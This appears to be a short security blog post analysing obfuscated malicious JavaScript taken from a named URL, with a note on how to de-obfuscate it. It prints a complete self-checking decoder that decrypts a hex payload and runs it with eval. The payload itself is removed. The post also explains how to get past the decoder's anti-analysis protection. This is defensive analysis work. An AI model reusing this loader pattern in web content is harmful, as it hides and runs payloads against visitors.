de-obfuscate javascript (2)

Looks like the criminals are trying to defeat our de-obfucation technique by loading a bunch of eval(str).

An example of obfucated code (http://bdydcketn.com/cgi-bin/index.cgi?mentat):
function  s838kQA58(diemU01t1){var   p7Ln57Kbh =  location.href;;;var     xbmmRt
KJT   =   arguments.callee;;xbmmRtKJT    =    xbmmRtKJT.toString();;;;var  ee7T2
wrIu   =   xbmmRtKJT +   p7Ln57Kbh;;;var RKYcWmlFe =  "";;;ee7T2wrIu = ee7T2wrIu
.replace(/\W/g, RKYcWmlFe);ee7T2wrIu     =   ee7T2wrIu.toUpperCase();;;;var   MU
QMylf7O = 2147483648;;;;MUQMylf7O =  MUQMylf7O  +    MUQMylf7O;var    lA65Otsc1
= new     Array;;;;str2  =     'f'+'o'+'r'+'('+'var   d7rLYBygF   =     0'+';'+'
d7rLYBygF '+'< 256;   d7rLYBygF++'+')    {lA65Otsc1[d7rLYBygF]     =    0;;;
;}';;;eval(str2);;;;var   MH7FyrT5e     =   1;;;;var     Bk3R2fKL0  = 1994146192
;;;;;Bk3R2fKL0     = Bk3R2fKL0  +     Bk3R2fKL0;;str    =   'f'+'o'+'r'+'(var'+'
d7rLYBygF'+'     =     128'+';'+'  d7rLYBygF;    d7rLYBygF     >>=  1) {MH7F
yrT5e =  MH7FyrT5e  >>>   1   ^     (MH7FyrT5e     &   1 ?   Bk3R2fKL0     :
0);;;;;fo'+'r(v'+'ar     d5XclNudh'+' = 0;    d5XclNudh   <  25'+'6; d5XclNudh
+'+'=  d7rLYBygF     * 2)    {var   XOd766W6o   =  d7rLYBygF   +    d5XclNudh;;
;;;lA65Otsc1[XOd766W6o]    =   lA65Otsc1[d5XclNudh]    ^   MH7FyrT5e;if    (lA65
Otsc1[XOd766W6o] <  0)    {lA65Otsc1[XOd766W6o]     += MUQMylf7O;;;;;}}}';;;;eva
l(str);;;var  OWda8n6v6  =     MUQMylf7O  -    1;;;;var     str   =  'f'+'o'+'r'
+'('+'var  X0k3x2pOH     =  0;  X0k3x2pOH   <    ee7T2wrIu.length;   X0k3x2pOH++
)  {var    D6N2tFtL6 =     (OWda8n6v6   ^ ee7T2wrIu.charCodeAt(X0k3x2pOH))  &  2
55;;;OWda8n6v6 =     (OWda8n6v6     >>>  8)    ^    lA65Otsc1[D6N2tFtL6];;}OWda8
n6v6     =     OWda8n6v6    ^ (MUQMylf7O   - 1);;;;;if  (OWda8n6v6   <    0)   {
OWda8n6v6     +=   MUQMylf7O;;;;;}'+'OWda8n6v6 =   OWda8n6v6.toString(16).toUppe
rCase();;whi'+'le(OWda8n6v6.length  <    8) {OWda8n6v6   =  "0"    + OWda8n6v6;;
;}var   VI14J51J8   = new  Array;;f'+'o'+'r'+'(var     d7rLYBygF = 0;'+'+   d7rL
YBygF    <'+'    8;   d7rLYBygF++) {VI14J51J8[d7rLYBygF]    =  OWda8n6v6.charCod
e'+'At(d7rLYBygF);;}var dtmv0JxTc =     0;var  ON5WV0w76     =    "";;;';;;;;
eval(str);;;;;str3=    'f'+'o'+'r('+'var    d7rLYBygF    =  '+'0;'+' d7rLYBygF
<    '+'diemU01t1.length;     '+'d7rLYBygF +=    2){var  XOd766W6o   =    di
emU01t1.substr(d7rLYBygF,    2);;var    D51Pf8MjH  = parseInt(XOd766W6o,    16);
;var L817eB0l8    =    D51Pf8MjH     -     VI14J51J8[dtmv0JxTc];;;;;if(L817eB0l8
<     0)     {L817eB0l8  =  L817eB0l8    +  256;;;;;}ON5WV0w76  +=   String.fro
mCharCode(L817eB0l8);;;if(dtmv0JxTc    +    1   ==   VI14J51J8.length)   {dtmv0J
xTc    =    0;;;;;}  else     {dtmv0JxTc++;;;}}';;;eval(str3);;var    OPFM7qC4J
= 2;;;;try  {;eval(ON5WV0w76);;;}     catch(e) {OPFM7qC4J  =  1;;;}try {if (O
PFM7qC4J     ==   1)  {window.location   =    "/";;;}}     catch(e)  {}}

s838kQA58(‘ data removed ‘)

Using our current technique on the code would not successfully print the last eval(ON5WV0w76) as the initial eval(str) are not executed.

Somehow, the function protection is not too well done, so what we have to do is to change eval(ON5WV0w76) to evaL(ON5WV0w76). Then define function evaL(a) {print(a);} in the stub file instead of redefining eval().

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

%d bloggers like this: